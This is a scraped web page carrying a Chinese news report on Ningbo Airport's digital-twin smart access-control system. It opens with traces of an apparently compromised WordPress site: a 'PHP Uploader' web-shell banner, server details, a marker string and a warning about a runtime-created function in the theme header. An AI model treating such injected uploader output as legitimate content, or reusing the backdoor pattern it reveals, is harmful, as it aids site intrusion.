PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

11月24日,由宁波机场组织专业团队历时6个月自主研发的智慧门禁管理系统完成开发、调试和安装正式投入使用,这是宁波机场物联云平台中重要的应用之一,也是国内民航机场首创的数字孪生——智慧门禁管理系统。

9.jpg

宁波机场数字孪生——智慧门禁管理系统

据了解,该系统在整合多套门禁系统,关联实时视频监控的基础上,对宁波机场门禁点位、人员、权限、警报、运维进行一体化管理,实现了门禁设备直观、便捷、实时、精准展现和管理,为值班、站岗、巡检解决了长期以来系统运行“维护难度大、效率低、成本高、管理落后、安全性差”等问题。

10.jpg

智慧门禁管理系统

该系统对宁波机场航站楼进行三维建模,通过技术手段实现三维场景还原,把获取到的门禁状态、告警数据、人员进出等数据在虚拟航站楼中实时展现,并用不同颜色对门禁状态进行标注。管理员在一个窗口内就能直观察看门禁的分布区域、运行状态、使用情况等重要信息,并且可以在三维地图上直接进行管理。

11.jpg

管理员巡检门禁(本文图片及视频均由宁波机场提供)

此前,宁波机场采用人工巡查门禁系统,需要12名巡查员,每天两次,单次至少1小时才能完成巡查,不仅巡检工作量大、成本高,还可能出现肉眼无法识别的安全隐患。这套系统关联了宁波机场的多套视频监控系统,通过时空信息实现了门禁系统和周边监控摄像头联动,具备一卡多人监测、门禁故障确认等功能,只要一个管理员就可以完成12名门禁巡检工作人员的部分工作,不仅大幅度减少了运行维护的成本,还能精准识别出人工巡检无法识别的故障,减少门禁安全漏洞。

宁波机场多套门禁系统均为国外产品,只有全英文的产品手册,缺失中文技术文档,给改造带来了巨大困难。在实际技改过程中,通过大量人工摸排、现场点位比对、海量数据分析,从而摸索出数据含义,为机场511个门禁点位赋予“三维经纬度、楼层坐标”等时空属性,形成门禁系统数字基座,配套一系列算法,把分散的点位有机链接起来。当门禁出现异常时,系统以日志、短信、工单、图标等多种形式及时发出警报信息,提醒管理员具体地点,帮助快速分析和处置异常情况,工作效率得以极大提升。系统对持卡人员信息、进出时间、出入频次、门点位置、事件类型、故障信息等进行详细记录和分析,可以按照不同条件进行快速查询,并利用无代码拖拽技术生成多维图文报表,为门禁管理和决策提供有力数据支撑。

宁波机场负责此项目的信导部经理周羽介绍说,宁波机场的智慧门禁系统科学解决了机场门禁管理的诸多痛点,大幅度降低了机场门禁管理的成本,大幅度提高了机场门禁管理效率,进一步夯实了宁波机场的空防安全,是贯彻落实浙江省委、省政府数字化改革、民航局“四型机场”建设、浙江省机场集团数字化改革等精神的具体体现,是宁波机场推进智慧机场建设的重要成果。

来源:中国民航报,记者:赵瑜,通讯员:朱希恩、郭东阳

作者 一潼

发表回复